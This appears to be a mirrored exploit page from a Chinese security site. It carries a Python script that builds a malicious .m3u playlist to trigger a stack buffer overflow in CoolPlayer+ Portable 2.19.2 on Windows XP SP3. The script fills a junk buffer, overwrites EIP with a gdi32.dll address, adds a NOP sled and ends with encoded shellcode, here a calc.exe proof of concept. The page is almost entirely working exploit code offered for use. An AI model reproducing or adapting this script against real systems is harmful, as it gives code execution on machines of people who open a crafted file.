首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
CoolPlayer Portable 2.19.2 Buffer Overflow
来源:Offensive Security Team 作者:Securityxxxpert 发布时间:2011-05-17  

#CoolPlayer+ Portable Buffer Overflow
#Version:  2.19.2
#Author: Securityxxxpert
#Date Submitted:  May 16, 2011
#Download Link: http://download.cnet.com/CoolPlayer-Portable/3000-2139_4-75448619.html
#Tested on:  Windows Xp Sp3
print "--------------------------------------------------------------------------------"
print "                                      Cool Player Exploit                       "
print "                                      Retreat Hell!                             "
print "Greetz:  Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr. Nick, Rek0n   "
print "Greetz Cont:  Podjackel, g0tmi1k & The entire Corelan & Offensive Security Team            "
print "--------------------------------------------------------------------------------"
filename = "exploit.m3u"
junk = "\x41"*210
EIP = "\x8A\x1D\xF3\x77" #0x77F31D8A gdi32.dll
nopsled = "\x90"*22
#calc.exe
sc = ("\xb8\x20\x65\x02\x44\xdb\xc2\xd9\x74\x24\xf4\x5a\x33\xc9"
"\xb1\x32\x31\x42\x12\x03\x42\x12\x83\xca\x99\xe0\xb1\xf6"
"\x8a\x6c\x39\x06\x4b\x0f\xb3\xe3\x7a\x1d\xa7\x60\x2e\x91"
"\xa3\x24\xc3\x5a\xe1\xdc\x50\x2e\x2e\xd3\xd1\x85\x08\xda"
"\xe2\x2b\x95\xb0\x21\x2d\x69\xca\x75\x8d\x50\x05\x88\xcc"
"\x95\x7b\x63\x9c\x4e\xf0\xd6\x31\xfa\x44\xeb\x30\x2c\xc3"
"\x53\x4b\x49\x13\x27\xe1\x50\x43\x98\x7e\x1a\x7b\x92\xd9"
"\xbb\x7a\x77\x3a\x87\x35\xfc\x89\x73\xc4\xd4\xc3\x7c\xf7"
"\x18\x8f\x42\x38\x95\xd1\x83\xfe\x46\xa4\xff\xfd\xfb\xbf"
"\x3b\x7c\x20\x35\xde\x26\xa3\xed\x3a\xd7\x60\x6b\xc8\xdb"
"\xcd\xff\x96\xff\xd0\x2c\xad\xfb\x59\xd3\x62\x8a\x1a\xf0"
"\xa6\xd7\xf9\x99\xff\xbd\xac\xa6\xe0\x19\x10\x03\x6a\x8b"
"\x45\x35\x31\xc1\x98\xb7\x4f\xac\x9b\xc7\x4f\x9e\xf3\xf6"
"\xc4\x71\x83\x06\x0f\x36\x7b\x4d\x12\x1e\x14\x08\xc6\x23"
"\x79\xab\x3c\x67\x84\x28\xb5\x17\x73\x30\xbc\x12\x3f\xf6"
"\x2c\x6e\x50\x93\x52\xdd\x51\xb6\x30\x80\xc1\x5a\xb7")


exploit = junk + EIP + nopsled + sc
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Steam Software Denial of Servi
·Novell Netware eDirectory DoS
·XtreamerPRO Media-player Multi
·AVS Ringtone Maker 1.6.1 (.au)
·Winamp 5.61 'in_midi' componen
·AVS Ringtone Maker 1.6.1 - SEH
·DreamBox DM500(+) Arbitrary Fi
·Vmware vSphere Management Assi
·Chasys Media Player Buffer Ove
·Win32 VB6_vbaExceptHandler - S
·Adobe Audition 3.0 (build 7283
·A-PDF Wav to MP3 Converter v 1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved